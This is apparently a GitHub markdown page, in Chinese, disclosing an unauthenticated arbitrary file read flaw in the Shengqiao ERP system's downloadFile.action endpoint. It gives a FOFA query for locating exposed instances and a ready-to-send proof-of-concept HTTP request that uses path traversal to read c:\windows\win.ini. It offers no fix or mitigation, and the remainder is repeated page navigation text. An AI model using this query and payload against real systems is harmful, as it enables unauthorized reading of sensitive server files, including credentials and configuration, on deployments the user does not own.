圣乔ERP系统downloadFile.action任意文件读取漏洞

圣乔ERP系统 downloadFile.action 存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件。

fofa

app="圣乔-ERP系统"

poc

GET /erp/wap/../downloadFile.action?absolutePath=true&file=c:\\windows\win.ini HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

圣乔ERP系统downloadFile.action任意文件读取漏洞.md

圣乔ERP系统downloadFile.action任意文件读取漏洞.md

圣乔ERP系统downloadFile.action任意文件读取漏洞

fofa

poc

Files

圣乔ERP系统downloadFile.action任意文件读取漏洞.md

Latest commit

History

圣乔ERP系统downloadFile.action任意文件读取漏洞.md

File metadata and controls

圣乔ERP系统downloadFile.action任意文件读取漏洞

fofa

poc